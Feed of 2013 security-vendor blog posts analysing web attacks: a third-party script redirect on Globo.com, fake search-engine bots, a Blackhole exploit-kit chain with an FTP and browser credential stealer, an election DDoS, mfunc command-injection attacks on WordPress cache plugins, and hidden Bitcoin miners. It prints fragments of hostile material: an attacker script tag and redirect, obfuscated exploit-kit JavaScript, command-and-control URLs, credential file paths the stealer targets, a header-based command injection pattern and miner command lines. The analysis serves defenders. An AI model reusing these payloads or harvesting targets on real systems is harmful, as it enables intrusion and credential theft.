That redirection has been going for a few hours at least and we detected it for the first time around 8am EST and it is still live four hours later (noon EST).

What is going on?

We are investigating, but at the bottom of any page inside google.com there is a script being loaded from sawpf.com:

<script defer src="httx://sawpf.com/1.0.js"></script>

That javascript file is being very slow to load, but when it does, it runs the following code:

 window.location = httx://pagesinxt.com/?dn=sawpf.com&fp=3WBUwymfgey…

Which forces the browser to redirect the to pagesinxt.com. At this point, we recommend all users to do not visit any globo.com page (or go there with Javascript disabled).

Who really owns your site?

This brings up a good topic that we brought up before. Who really owns your site? Every time you include a javascript (or widget or iframe), the security of your site becomes dependent on that third party server. It doesn’t looks like Globo in itself got compromised, but since they are including code from sawpf.com, they are only as secure as them.

Every time you add a remote JavaScript (or widget or iFrame) to your site, you are giving the server that houses that code full control of what is displayed to your users. If their servers get compromised, your site will be compromised as well.

Can you imagine if the author of the Easing Plugin was malicious? Instead of just that pop-up, they could have added a URL redirect to send all your users to any site they of their choosing (SPAM, porn, you name it). What if their server was hacked? The attackers could have added malware and it would have loaded to all your users.

*update 1: Lots of users on Twitter are complaining about it as well. Search for sawpf or pagesinxt to see the amount of people complaining or worried about it.

*update 2: If you click on some urls inside sawpf.com, you will be redirected to pagesinxt.com as well ( for example: httx://sawpf.com/libs/jquery/1.7.1.js )

13/May/2013:09:20:29 +0000] 80.72.37.156 “IP Address not authorized” “POST /wp-login.php HTTP/1.1″ 403 “” “Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)”

In this specific instance they are concerned that we are blocking Bing because of this reference: bingbot/2.0; +http://www.bing.com/bingbot.htm. They are especially concerned when it says Googlebot, like this one:

13/May/2013:18:27:14 -0400] 198.50.161.234 “Spam comment blocked” “POST /blog/wp-comments-post.php HTTP/1.0″ 403 “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”

Nobody wants to block Google out of their sites.

If you are not familiar with HTTP and logs, the first snippet is saying that the IP address 80.72.37.156 tried to login to wp-login.php and it identified itself as Bingbot. In the second log, it is saying that the IP address 198.50.161.234 tried to send a comment and it identified itself as Googlebot.

We do not block any major search engine bots!

One things most users do not know is that anyone can fake or modify the “User Agent” (browser id) of their request to look like it is coming from somewhere else.

So what do attackers do? They emulate a real browser, like Google Chrome or Firefox, and sometimes also try to identify themselves as bots like those provided by Google, Bing, Yandex and many others, to see if they can evade detection.

This is why we do not rely on the user agent alone to detect if real bot is crawling your site.

Identifying a real bot

This is what a real Google bot looks like in the logs:

66.249.73.141 – - [13/May/2013:04:58:13 -0400] “GET / HTTP/1.1″ 200 6095 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”

First, their IP address always resolves back to Google’s domain. So if you try to do an IP lookup you’d see it points back to the Google domain:

$ host 66.249.73.141
141.73.249.66.in-addr.arpa domain name pointer crawl-66-249-73-141.googlebot.com.

And the same applies to Bing, Yandex and all other real search engines.

Second, another red flag, these bots will not be trying to send comments or logging in to your website. If you see any login attempt from any of them, you know it is someone just impersonating their requests. If you are not sure, try to see where the IP is coming from. If we use the first example from this post, we would see that the IP 80.72.37.156 actually comes from Polish IP address (likely a compromised server):

$ host 80.72.37.156
156.37.72.80.in-addr.arpa domain name pointer host-156.etop.dev.pl.

Fake Bots and Comment spam

Interestingly enough, from our data points, we are seeing a large percentage of comment spam leveraging this technique of faking their user agent. So far in May, 2013, we have blocked 33,988 spam comments using this technique:

2013/Jan: 41,660 spam comments blocked coming from fake Googlebot
2013/Feb: 71,747 spam comments blocked coming from fake Googlebot
2013/Mar: 106,197 spam comments blocked coming from fake Googlebot
2013/Apr: 68,708 spam comments blocked coming from fake Googlebot

Now you know

So next time you see a Bot visiting your site, you should be able to identify if it’s real or not. If you are not sure, just ask and we will be happy to help.

In this example, we’ll be showing you how an attacker is injecting a site with a dynamic iFrame generator, which then attempts to install a malicious payload on your machine. More importantly, we’ll show you what that file is doing locally.

We were actually very lucky in this instance. Instead of a banking trojan, we were able to get our hands on a payload that is designed to steal not only your Browser information, but your FTP credentials as well. This can then be used to compromise any website you own, completing the life cycle of the injection:

compromised site -> compromised desktop -> stolen FTP passwords -> more compromised sites

1- Compromised sites with auto generated iframes

A WordPress site was hacked via brute forcing their wp-admin admin password. We were able to see in the logs that after multiple login attempts, the attackers succeeded and logged in as administrator and used the theme editor to insert the following code at the top of the header.php of the theme:

If you don’t know PHP, this code will contact the website http://82.200.204.151/config.inc.php and will act as a connection to the command and control server to get confirmation of what it should do. This is done in this part of the code:

Which we can easily replicate using Curl to see what it replies:

As I am writing this post, it returns “httx://andlettherebelight.com/news/faults-ending.php”. The same code will get that URL and inject the following iFrame at the bottom of the website, usually after the closing “” tag:

2- From server level code to browser injection

That iFrame from httx://andlettherebelight.com/news/faults-ending.php gets executed every time someone visits the compromised site. And once called, it returns code from the infamous Blackhole Exploit kit. It is a heavily obfuscated JavaScript that looks something like this:

<body asd=123><script>z=eval ; ss=String;
dd="d"+"i"+"v"; 
function vq(){for(i=0;a.length>i;i++){if(az)zz();}}gg=("getElementsByTagName");..
<style>.d{visibility:hidden;}</style><div class="d">95.89.95.89.62.a0.9b.8a.97.98.8e.94.93.5f.47.55.53.5c.53.5e.47.51.93.86.92.8a.5f.47.
95.89.95.89.47.51.8d.86.93.89.91.8a.97.5f.8b.9a.93.88.99.8e.94.93.4d.88.51.87.51.86.4e.a0.97.8a.99.9a.97.93.45.8b.9a.93.88.99.8e.94.93.4d.4e.a0.88.4d.
87.51.86.4e.a2.a2.51.94.95.8a.93.79.86.8c.5f.47...
... long long code..

A check shows that the distribution payload is not very well detected by Anti-Virus companies. As you can see on VirusTotal, it is 1/46 for one sample:

First sample https://www.virustotal.com/en/file/404dce722c425a7b64b626a32848a22734b2136b35dbbe62760bf9355b86a0da/analysis/1367070666/:

And 1/46 for another one: https://www.virustotal.com/en/file/45ccc879794713da5ba59c212f87b0d9fbb5bcc95e8acdbf086015827edf7563/analysis/1367070678/:

This means that out of 46 engines, only 1 detected those samples, AVG on the first one and Fortinet on the second. This doesn’t mean that it you won’t be protected at the end-point, but it does mean that they are not able to detect this distribution payload.

4- Command and control and new URLS

Below is a list of all the sites that have been used in the compromise in the time that we have been monitoring this C&C. They seem to rotate out every few hours and the domain does not replicate, this can be for a number of reasons like evading detection, website is cleared of compromise, etc…

Here is the list of the various domains that have been used:

http://john-aaroe-group-sherman-oaks.com/news/faults-ending.php  (50.116.6.12)
http://listingpresentationonline.com/news/faults-ending.php (50.116.6.12)
http://sagerealestate.ca/news/faults-ending.php (184.172.149.128)
http://palmspringsrentalsvacation.com/news/faults-ending.php (50.116.6.12)
http://realtor-com-hollywood-hills-ca.com/news/faults-ending.php (50.116.6.12)
http://realtor-com-larchmont-village-ca.com/news/faults-ending.php (50.116.6.12)
http://realtor-com-sherman-oaks.com/news/faults-ending.php (50.116.6.12)
http://mydadsbest.com/news/faults-ending.php (66.228.44.144)
http://andlettherebelight.com/news/faults-ending.php (66.228.44.144)
http://firepointmedia.net/news/faults-ending.php (66.228.44.144)
http://burienanimalcontrol.com/news/faults-ending.php (50.116.61.32)
http://burienbandapalooza.com/news/faults-ending.php (50.116.61.32)
http://iloveburien.com/news/faults-ending.php (50.116.61.32)
http://markrestaurant.com/news/faults-ending.php (50.116.61.32)
http://optimarkeyecare.com/news/faults-ending.php (50.116.61.32)
http://enteratebusiness.com/news/faults-ending.php (50.116.61.32)
http://enteratecalifornia.com/news/faults-ending.php (50.116.61.32)
http://igreenmarketing.com/news/faults-ending.php (50.116.61.32)
http://spencerandashley.com/news/faults-ending.php (50.116.61.32)
http://usedchairlifts.com/news/faults-ending.php (50.116.61.32)
http://sherman-oaks-condos-for-sale.com/news/faults-ending.php (173.230.128.250)
http://atlanticshowroom.com/news/faults-ending.php (173.230.128.250)
http://albiontirecity.com/news/faults-ending.php (173.230.128.250)
http://seniorcarecard.com/news/faults-ending.php (50.116.12.172)
http://thisplaceiknow.co/news/faults-ending.php (50.116.12.172)
http://thisplaceiknow.info/news/faults-ending.php (50.116.12.172)
http://thisplaceweknow.org/news/faults-ending.php (50.116.12.172)
http://wegotaplace.co/news/faults-ending.php (50.116.12.172)
http://wegotaplace.info/news/faults-ending.php (50.116.12.172)
http://wegotaplace.net/news/faults-ending.php (50.116.12.172)
http://wehaveaplace.net/news/faults-ending.php (50.116.12.172)
http://weknowhomecare.com/news/faults-ending.php (50.116.12.172)
http://weknowhomecare.info/news/faults-ending.php (50.116.12.172)
http://allamericantireinc.com/news/faults-ending.php (174.140.171.249)
http://allautoandtruck.net/news/faults-ending.php (174.140.171.249)
http://allstatetire.net/news/faults-ending.php (174.140.171.249)

5- From browser injection to owned Desktop

We wanted to see if they are using the same payload each time, and it appears they are. Unlike most of our other research, we decided to see what it might be doing at the end-point. Special thanks to Jerome Segura of Malwarebytes for the help on this front.

It appears that the attackers are performing a drive-by-download in an effort to steal credentials. We often talk about this, but today we can show you more. In this instance working off Windows OS with IE8, we were able to trigger the payload when the conditions are met. This is what the user was greeted with:

If you’re not aware, this is pretty close to what the old download page looked like. This is what it looks like today:

The first sign of fraud should be the domains. The fake one is coming from hxxp://graphicsspecialistsgroup.com/adobe/ and the real one comes from get.adobe.com/flashplayer. When the user clicks on the download the browser will download a file called update_flash_player.exe. This file is being stored on the compromised server and is located in the same directory mentioned above /adobe.

When the user installs the payload, it performs a silent install. There are not actions required by the user, unclear why but it kills the Windows Rundll32 library, then it goes silent. There is no other action to show that something has occurred and to the unsuspecting user it would seem as the update went flawlessly.

This is where our friend Jerome comes into play, he was able to point us in the direction of a few resources that would help us better diagnose what the payload was doing. Surprisingly, when we checked with VirusTotal to see which end-point solutions would detect the payload, only 10 of the 46 players detected.

Fortunately, there are a few good resources out there and we were able to break down the payload further to understand what it was doing. Here is what we know:

• It starts a server listening agent on 0.0.0.0:0
• Steals private local information from local internet browsers
• Harvest credentials from local FTP client software
• Installs itself for auto run at Windows startup

Here is a list of all the domains it touches, or reaches out to, when installed:

mail.yaklasim.com	            212.58.4.13
www.brozziassicurazioni.it	    62.149.130.81
www.google.com	            173.194.78.147
www.google.nl	            173.194.78.94
cdn162.filesnetuploadlist.com  78.131.140.159

Here are a few examples of some of the data points it looks to harvest:

C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP\sm.dat
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP\*.*
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP Pro\*.*
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP Lite\*.*
C:\Documents and Settings\User\Application Data\FlashFXP\3\Sites.dat
C:\Documents and Settings\User\Application Data\FlashFXP\4\Sites.dat
C:\Documents and Settings\User\Application Data\FlashFXP\3\Quick.dat
C:\Documents and Settings\User\Application Data\FlashFXP\4\Quick.dat
C:\Documents and Settings\User\Application Data\FlashFXP\3\History.dat
C:\Documents and Settings\User\Application Data\FlashFXP\4\History.dat
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Sites.dat
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Sites.dat
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Quick.dat
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Quick.dat
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\History.dat
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\History.dat
C:\Documents and Settings\User\Application Data\FileZilla\filezilla.xml
C:\Documents and Settings\All Users\Application Data\FileZilla\sitemanager.xml
C:\Documents and Settings\All Users\Application Data\FileZilla\recentservers.xml
C:\Documents and Settings\All Users\Application Data\FileZilla\filezilla.xml
C:\Documents and Settings\User\Local Settings\Application Data\FileZilla\sitemanager.xml
C:\Documents and Settings\User\Local Settings\Application Data\FileZilla\recentservers.xml
C:\Documents and Settings\User\Local Settings\Application Data\FileZilla\filezilla.xml
C:\Documents and Settings\User\Local Settings\Application Data\BulletProof Software\*.*
C:\Documents and Settings\User\Application Data\BulletProof Software\*.*
C:\Documents and Settings\All Users\Application Data\BulletProof Software\*.*
C:\Documents and Settings\User\Application Data\SmartFTP\*.*
C:\Documents and Settings\All Users\Application Data\SmartFTP\*.*
C:\Documents and Settings\User\Local Settings\Application Data\SmartFTP\*.*
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\profiles.ini
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\vglnv7s6.default\*.*
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\vglnv7s6.default\bookmarkbackups\*.*
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\vglnv7s6.default\minidumps\*.*
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\vglnv7s6.default\signons.sqlite
C:\Program Files\Mozilla Firefox
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\vglnv7s6.default/secmod.db
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\vglnv7s6.default\secmod.db
.......

Any of these names ring a bell? What you have here is a perfect example of a payload looking to harvest the data you are storing in your local clients, both browser and FTP.

When it installs it also makes connection with a number of different sites:

Here you can see two things, the authentication is occurring in the first step against the yaklasim.com site, and the payload is being retrieved from the brozziassicurazioni.it site. If you do some more research you find that that the yaklasim site is actually a known malicious domain. This domain is being used for a number of drive by download attacks ranging from stealing credentials like what I described above, to installing banking trojans. Further research shows that the authentication boxes seem to be originating out of Turkey:

IP Address	213.128.73.123

Host	        server-213.128.73.123.radore.net.tr

Location	TR, Turkey


5- Cleaning up and preventing
As you can see, this type of malware goes the full circle. It compromises websites and use them to infect desktops. Once a desktop is infected, it will use it as part of their botnets, and if the owner of the desktop also has a website, it will use that to inject malware as well.
Our SiteCheck scanner detects this type of injection so if you suspect your site has been compromised, you can check it in there.
]]>
			http://blog.sucuri.net/2013/05/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html/feed
		0
		http://blog.sucuri.net/2013/05/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html
		
		
		http://feedproxy.google.com/~r/SucuriSecurity/~3/955fYlJgy1c/malaysian-election-and-ddos.html
		http://blog.sucuri.net/2013/05/malaysian-election-and-ddos.html#comments
		Sat, 04 May 2013 16:20:45 +0000
		David Dede
				
		

		http://blog.sucuri.net/?p=7300
		
Read More]]>
				Malaysia is having an election this weekend that has been surrounded by issues. We won’t go into the politics, but one of our client’s sites (a popular Malaysian news source that we won’t name), started to suffer a very large scale DDOS (distributed denial of service attack). Reuters also has a similar story about another site and we can confirm what they are saying:


(Reuters) – Ahead of Malaysia’s elections on Sunday, independent online media say they are being targeted in Internet attacks which filter content and throttle access to websites, threatening to deprive voters of their main source of independent reporting.

This specific Malaysian site has been targeted for a couple of weeks, but since May 1st, their sites were hit by a very large botnet.

To protect the innocent, we won’t go into much details, but the green in the graph is the outbound data and the blue is the inbound. And that means thousands of simultaneous connections per second being sustained for the last 4 days against them.
Technical details
This DDOS is httpd-based and is targeting their web server. It started by targeting their 404 handler by trying to visit pages that do not exist. What was interesting is the choice of URL they decided to use “FloodFloodFLOOD”:

175.137.68.143 – - [01/May/2013:10:00:38 -0400] “GET /wp-content/uploads/2013/05/FloodFLOODFloodFLOOD.png HTTP/1.1″ 404
w – - [01/May/2013:10:00:38 -0400] “GET /wp-content/uploads/2013/05/FloodFLOODFloodFLOODFloodFLOODFLOOD.png HTTP/1.1″ 404 0 
183.171.176.221 – - [01/May/2013:10:00:38 -0400] “GET /wp-content/uploads/2013/05/FloodFLOODFloodFLOODFloodFLOOD.png HTTP/1.1″ 404

That can be easily blocked and filtered, so they quickly switched to more complex types of attacks. Since the site is WordPress, they decided to target the search function to bypass any internal caches and make sure that each page is actually loaded:

175.136.214.155 – - [02/May/2013:11:57:30 -0400] “GET /?s=1367683016682 HTTP/1.1″ 200 154 “http://www.erapasca.com/2013/05/pecah-berita-tanda-bn-nak-tumbang.html” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.56 Safari/537.36″

175.136.214.155 – - [02/May/2013:11:57:30 -0400] “GET /?s=1367683016683 HTTP/1.1″ 200 154 “http://www.erapasca.com/” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.56 Safari/537.36″

123.136.106.225 – - [02/May/2013:11:57:30 -0400] “GET /?s=1367682722241 HTTP/1.1″ 200 154 “http://www.erapasca.com/2013/05/pecah-berita-tanda-bn-nak-tumbang.html” “Mozilla/5.0 (Linux; Android 4.0.3; GT-P5100 Build/IML74K) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.169 Safari/537.22″

175.140.99.225 – - [02/May/2013:11:57:30 -0400] “GET /?s=1367682708689 HTTP/1.1″ 200 154 “http://siaranradioonline.blogspot.com/search/label/” “Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; BOIE9;ENUS)”

.. thousands more per second ..

Notice that those referers and user agents are likely fake and just being used to try to bypass any security filter.
Size of the DDOS and their Botnet
What is actually impressive about this attack is the number of IP addresses (bots) being used. Just in the last 24 hrs, 36,367 (yes, 36 thousand different IP addresses ) were used to attack this site. It means that the people behind it have good power. What is interesting is that all IP addresses also come from Malaysian IP ranges and it seems to come from compromised desktops.
Since it is an ongoing event, we won’t give more details and we are working with the proper authorities and the Malaysian CERT to stop them.
]]>
			http://blog.sucuri.net/2013/05/malaysian-election-and-ddos.html/feed
		0
		http://blog.sucuri.net/2013/05/malaysian-election-and-ddos.html
		
		
		http://feedproxy.google.com/~r/SucuriSecurity/~3/r3Zo6r-nkFc/w3-total-cache-and-wp-super-cache-vulnerability-being-targeted-in-the-wild.html
		http://blog.sucuri.net/2013/05/w3-total-cache-and-wp-super-cache-vulnerability-being-targeted-in-the-wild.html#comments
		Sat, 04 May 2013 04:03:27 +0000
		Tony Perez
				
		
		
		
		
		
		

		http://blog.sucuri.net/?p=7261
		
Read More]]>
				As if on queue, almost 7 days since we released the post about the latest W3TC and WP Super Cache remote command execution vulnerability, we have started to see attacks spring up across our network. 

In our post you might remember this:
<!–mfunc echo PHP_VERSION; –><!–/mfunc–>

In this example we explained how it was a very simple approach to displaying the version of PHP on your server. There were a lot of questions following that saying, well what’s so harmful in that. Etc… With little help from us the attackers go on to show us what they can do. 
Taking a Look at the Attacks
In this section I’ll show you three of the various attacks we’re seeing. In each you can see how they abuse the mfunc vulnerability, one in a more traditional approach of injecting a backdoor and other in a more creative way that allows them to abuse HTTP headers. In either case they all seem to be getting passed via comments, and we give an example of that below. This is obviously for educational purposes only.


Example One – Targeting HTTP Headers
So in this example we see them abusing the mfunc vulnerability to pass shell commands via the HTTP headers in the place of the URL itself.

In this instance they are attacking your site while leaving very little trace, for instance they can do things like:
HTTP_CMD: Base64 encode of the backdoor/code they want to run

And it works with GET. Here is a better explanation if you’re not following:
A normal header would look something like this:
Connected to site.com (IP) port 80 (#0)
GET / HTTP/1.1
User-Agent: curl/7.24.0 (x86_64-apple-darwin12.0) libcurl/7.24.0 OpenSSL/0.9.8r zlib/1.2.5
Host: blog.sucuri.net
Accept: */*

With this attack it’d look something like this:
Connected to site.com (IP) port 80 (#0)
GET / HTTP/1.1
User-Agent: curl/7.24.0 (x86_64-apple-darwin12.0) libcurl/7.24.0 OpenSSL/0.9.8r zlib/1.2.5
Host: blog.sucuri.net
HTTP_CMD: Base64 encode of the backdoor/code they want to run
Accept: */*

Most folks would never even log that, so forensically speaking it’d be hard to know they were attacking this way. 
Example Two – Passing a Backdoor
So in this example they misuse the mfunc and use it to pass a backdoor into your server. Not nice at all. 

In this case it looks a bit worse, but when you decode it, it’s a lot easier to understand, her it is decoded:

Do you see what they’re doing? How they’re passing basic PHP commands to your server? Look here:
fopen
fputs
eval
base64_decode
fclose

They’re using basic PHP functions against you. They use the fopen to open a new file called maeksv.php. They then inject the payload into that file using puts, they encode it, and proceed to close the file. If you look at the payload that was dropped into that file you find something like this:

Don’t worry, a little fine tuning and you see it’s real intention here:

Using this the attacker can now do something like this:
http://goodsitebeingexploited/wp-content/cache/dcfay.php?jebfvlg=

Example Three – Embedded with Comments
We know that these are occurring via comments but it’s always fun to see the things they say, like this for instance:

Or even this:

So in these scenarios they are leaving you what appear to be legitimate, yet silly, comments. If you’re none the wiser that’s all you’d see, approve and be on your way. 
Where are they Coming From
Well, here are some of the IPs we’re picking up via our network:
188.142.107.174
122.72.12.90
91.224.160.104
91.224.160.104
119.36.87.32
92.126.217.47
74.91.17.35
58.23.3.190
220.255.1.77
220.255.1.44
220.255.1.31
95.154.243.11
91.224.160.104
201.59.55.142
201.249.21.35
119.36.87.32
125.67.234.251
177.12.227.13
77.175.95.163
190.205.16.152
109.123.111.99
211.138.151.117
183.63.27.145
84.39.28.158
91.224.160.104
94.199.60.19
54.248.89.183
185.12.46.81
87.236.208.232
36.48.69.182
83.236.193.82
177.10.24.34
118.186.86.38
114.80.136.171
77.235.192.178
58.240.98.179
85.15.227.78
78.46.64.21
119.254.84.87
78.46.64.21
91.224.160.104
78.46.64.21
78.46.64.21
91.224.160.104
124.227.191.75
54.234.65.111
54.246.89.20

Some quick look ups show us IPs coming from all over – Netherlands, Brazil, China, Russia, Singapore.. 
What To Do?
The most obvious thing is to update immediately, both authors have made changes to their core to address these issues. That in it of itself will help you. Other options include the following:

Leveraging a Web Application Firewall (WAF)
Adding Captcha’s to comments to deter spam bots
Ensure all comments are going through some kind of moderation
Don’t land the comments on your server, leverage 3rd party plugins – e.g., Disqus

In the guidane above do realize that the captcha won’t necessarily protect you if you accept it, but it should slow bot attacks. 
]]>
			http://blog.sucuri.net/2013/05/w3-total-cache-and-wp-super-cache-vulnerability-being-targeted-in-the-wild.html/feed
		0
		http://blog.sucuri.net/2013/05/w3-total-cache-and-wp-super-cache-vulnerability-being-targeted-in-the-wild.html
		
		
		http://feedproxy.google.com/~r/SucuriSecurity/~3/9wirFA9wdWQ/who-really-owns-your-website-please-stop-hotlinking-my-easing-script-use-a-real-cdn-instead.html
		http://blog.sucuri.net/2013/05/who-really-owns-your-website-please-stop-hotlinking-my-easing-script-use-a-real-cdn-instead.html#comments
		Fri, 03 May 2013 18:35:50 +0000
		Daniel Cid
				
		
		
		

		http://blog.sucuri.net/?p=7215
		
Read More]]>
				For the last few days, we have had some customers come to us worried thinking that their websites were compromised with some type of pop-up malware. Every time they visited their own site they would get a strange pop up:


“Please stop hotlinking my easing script — use a real CDN instead. Many thanks”

What is going on?
We did some Google searches and found hundreds of threads with people worried about the same thing. Out of no where, that pop-up was showing up on their web sites. Were they all hacked?




Through further research we found that all of the sites in the results had a JavaScript include from: http://gsgd.co.uk/sandbox/jquery/easing/jquery.easing.1.3.js.  This file is part of the popular jQuery Easing Plugin. It seems the author of that plugin got upset that many people were linking directly from his site, and modified the content of that file to give that warning instead. He posted an explanation on his site about it:

Popup? If you’re coming here because of a popup on your site I’m sorry, but the increased hotlinking has caused me issues with my hosting company so I’m taking steps to try and sort it out. Please upload the script to your own server and update any urls pointing to gsgd.co.uk to use that version of the file or you could try using the above url for CDN (though this currently only has the 1.3 easing script, look at http://cdnjs.com/ for more info and maybe try and add any missing files/versions still in use).
Please also note, I have no problem with anyone’s use of the plugin without my knowledge or permission, it’s just the hotlinking that’s causing me a headache.

Who Really owns your site?
Most users had no idea that they were even using that plugin. Most developers that include it probably dodn’t even think about the hotlinking issue. It seems that plugin documentation used to give examples pointing to gsgd.co.uk, so the developers just copied and pasted directly into their sites.
What was more worrying to our client was the power that someone else had over their site. 
You are not really the only owner of your site
Every time you add a remote JavaScript (or widget or iFrame) to your site, you are giving the server that houses that code full control of what is displayed to your users. If their servers get compromised, your site will be compromised as well. 
Can you imagine if the author of the Easing Plugin was malicious? Instead of just that pop-up, they could have added a URL redirect to send all your users to any site they of their choosing (SPAM, porn, you name it). What if their server was hacked? The attackers could have added malware and it would have loaded to all your users.
This is very common. For example, look at the techcrunch.com website (big news outlet). They load JavaScript from all these domains:

http://o.aolcdn.com/


http://pshared.5min.com/


http://js.adsonar.com/


http://scorecardresearch.com/


http://tctechcrunch2011.wordpress.com/


http://platform.twitter.com/


http://connect.facebook.net/


https://apis.google.com/


http://cdn.optimizely.com/


http://r-login.wordpress.com/


http://cdn.insights.gravity.com/


So their security is not only dependent on their own site, but if any of those 11 sites they include in their site gets hacked, it will affect their users as well. 
They are not alone. Our own blog, includes code from:

http://disqus.com


http://s.gravatar.com


http://stats.wordpress.com


http://connect.facebook.net/


So our blog security is also dependent on those 4 sites (Facebook, Disqus, Gravatar and WordPress). Including code from Google CDN,Twitter, Facebook or any major publisher is likely low risk being they have a pretty good level of security. That said, there is still a level of risk you are accepting for you and your visitors. Another thing to consider is the risk increases significantly when you include code from smaller and less known locations. 
The Solution?
If you are using this plugin, just remove the include from gsgd.co.uk, download the plugin and store it locally. That’s an easy fix.
I also recommend that you look at the source of your site to see what else you have included. 
Do a view-source: on your browser and search for <script or <iframe to see what is being loaded. You might be surprised. Our SiteCheck Scanner also prints a list of JavaScript and iframe links we found, so you can use that as well.
]]>
			http://blog.sucuri.net/2013/05/who-really-owns-your-website-please-stop-hotlinking-my-easing-script-use-a-real-cdn-instead.html/feed
		0
		http://blog.sucuri.net/2013/05/who-really-owns-your-website-please-stop-hotlinking-my-easing-script-use-a-real-cdn-instead.html
		
		
		http://feedproxy.google.com/~r/SucuriSecurity/~3/mfmk7PazkrI/game-of-coins-the-uprise-of-bitcoin-mining.html
		http://blog.sucuri.net/2013/05/game-of-coins-the-uprise-of-bitcoin-mining.html#comments
		Thu, 02 May 2013 20:14:20 +0000
		Dre Armeda
				
		
		
		
		
		
		
		
		

		http://blog.sucuri.net/?p=7048
		
Read More]]>
				Research by Daniel Cid. Authored by Dre Armeda. 


One thing you can’t take away from some of the attackers we deal with everyday is their creativity. From time to time we write about new trends we’re seeing, and this post is no different. We’re seeing a new tactic recently, and it may be affecting your pockets, even if you’re not into the latest trend of using digital currency.  

Digital currency you say?
I sure did! Bitcoin to be exact.



Bitcoin is not widely adopted yet, and the currency currently trades outside the control of centralized banks. You may not know what a Bitcoin is, and don’t worry, a lot of people still don’t. 
This doesn’t mean this isn’t important, or doesn’t apply to you, so make sure to read on and learn.



From the Bitcoin website:

Bitcoin is a digital currency, a protocol, and a software that enables

Instant peer-to-peer transactions
Worldwide payments
Low or zero processing fees
And much more!


Still not following? Here’s a better definition that may help:

Bitcoin is an experimental, decentralized digital currency that enables instant payments to anyone, anywhere in the world. Bitcoin uses peer-to-peer technology to operate with no central authority: managing transactions and issuing money is carried out collectively by the network.

Here is a quick video explaining the peer-to-peer, open source currency:

This sounds awesome to me. An anti-authoritarian currency that’s already in active use, and being adopted by some pretty big names! 
If you’re a WordPress.com user, you can now pay for upgrades using Bitcoin. Ever purchase anything on Etsy.com? That’s right, there are currently near 100 vendors accepting the digital payment option. NameCheap, Reddit, and 4Chan round up a quick list of names featured in a Mashable article about Bitcoin recently.
Staying power is still undetermined, but for now the currency continues to grow, and that’s important to know.
Mining for Gold
Now that you have a better understanding of this growing crypto-currency, we’re going to chat a bit about generating the currency, and then we’ll move on to our little discovery. 
Although we’d all love to have a real money tree, you’re in the wrong forest if you think you found it here. However, the currency still needs to be generated, and it’s a fairly complex process named Mining. 
Paper money is usually created and distributed by goverments, in the case of Bitcoin, there is no government. With Bitcoin you have Miners. Bitcoin Miners are entities that use special software to solve difficult math problems, and in exchange are issued a certain amount of Bitcoins. 
Here’s a great video explaining the process of Mining, it’s importance, and how heavy the process can be.

In the early days Miners were quickly solving the math problems needed to generate bitcoins locally on their personal computers. This became more difficult because the intensity of processing power needed to solve the necessary math problems continued to rise as the network of Miners grew. The math problems continued to become more resource intensive which lead to the production of commercial processors that were reprogrammed for Mining specifically. 
The processes and technologies used to generate Bitcoins has seen various iterations. Even today as more Miners join the network, the math problems continue to grow more complex. 
This is where Pools come into play. Pools are groups or units of Miners. Pools are able to solve problems faster, and in turn are rewarded for their contributions. Although this distributes the heavy resource lead, it certainly doesn’t offload the resource requirement completely. There is still a demand for processing power and resources to perform the computations needed to solve the problems. 
Where do we go to get these resources if we want to compute faster? In there lies our little discovery.
What the Falcon?


We see a lot of different attacks. We see a lot of vulnerabilities leading to various categories of compromised websites. Our research in this case leads us towards a different type of payload, a different type of exploit. To be fair, this is a new world of digital payment, there will likely be future efforts by attackers.
Instead of injecting malware or SPAM, or even performing the usual malicious acts we normally blog about, the attackers are hiding Bitcoin Mining software below the application layer in the stack. Ultimately what they are doing is attacking server to leverage its resources for their Mining purposes.
How’s it Happening?
The first case we discovered was a few weeks ago. A website we were cleaning was suspended for using far too many resources. During remediation we took a look at the process list and what do you know, hidden inside /var/www/site.com/wp-content/plugins/akismet/mysqld we found a Miner running and masking itself as the mysqld binary. 
We took a quick look at the processor resources by running the top command in terminal:
30104 userx 18 0 311m 9176 2020 S 97.2 0.3 4916:23 ./mysqld --url http://pool.give-me-ltc.com:8080

The top results show that this mysqld binary has been running for many hours and consuming almost 100% of the CPU resources. Keep in mind that this is a large web server hosting thousands of websites. After a few days pegged at 100% CPU usage the hosting company noticed and shut the client down.
That was the first case, but not the last. What first appeared to be an anomaly is not repetitive. Here is a sample from another website that was banned for using too many resources:
Again a quick top command and the proof is in the pudding:
22274 usery 20 0 249m 4612 824 S 29.1 0.0 124:39.70 ../mine.16 --url=http://vibehacks.net/ --userpass=HIDDEN 

Although the resource usage wasn’t as intensive in this case, they were still very high. This time top showed that a binary named /mine.16 had been running for days using almost 30% of the CPU for mining purposes. 
